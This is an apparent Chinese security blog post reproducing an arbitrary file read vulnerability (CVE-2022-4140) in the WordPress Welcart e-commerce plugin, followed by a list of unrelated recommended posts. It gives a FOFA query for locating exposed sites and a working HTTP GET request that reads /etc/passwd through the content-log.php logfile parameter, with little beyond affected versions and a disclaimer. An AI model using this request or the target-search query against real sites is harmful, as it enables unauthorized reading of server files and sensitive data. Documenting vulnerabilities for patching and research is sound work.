【漏洞复现】WordPress Welcart 任意文件读取漏洞(CVE-2022-4140)

0x01 产品简介

Welcart 是一款免费的 WordPress 电子商务插件。Welcart 具有许多用于制作在线商店的功能和自定义设置。您可以轻松创建自己的原始在线商店。

0x02 漏洞概述

Welcart存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取任意文件,获取服务器敏感信息。

0x03 测绘语句

复制代码
fofa: body="wp-content/plugins/usc-e-shop"

0x04 漏洞复现

复制代码
GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1

0x05 影响范围

复制代码
Welcart < 2.8.5

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
Xzq21050913 分钟前
网络编程套接字(TCP)
服务器·网络·tcp/ip
Promise微笑28 分钟前
2026年回路电阻测试仪厂家深度测评:电力安全与技术前瞻
安全
xhyyvr41 分钟前
VR科普学习一体机|开启智慧安全教育新时代
学习·安全·vr
星夜落月43 分钟前
给自己搭一个私人阅读空间:FreshRSS 部署手记
运维·服务器·网络·rss
xuansec1 小时前
【JavaEE安全】Spring Boot 安全实战:JWT 身份鉴权与打包部署
spring boot·安全·java-ee
娇娇yyyyyy1 小时前
C++ 网络编程(22) beast网络库实现websocket服务器
网络·c++·websocket
心前阳光1 小时前
Mirror网络库插件使用4
java·linux·网络·unity·c#·游戏引擎
DevSecOps选型指南1 小时前
直击AI全生命周期安全治理,悬镜正式发布原创多模态AIST新品
人工智能·安全·自然语言处理
jimy11 小时前
字节流(XML、JSON、文件、网络、图像、加密…)必须用无符号语义unsigned char
xml·c语言·网络·json
乾元1 小时前
本地大模型:如何在内网部署 Llama/Qwen 等安全增强模型
运维·网络·人工智能·安全·机器学习·llama·安全架构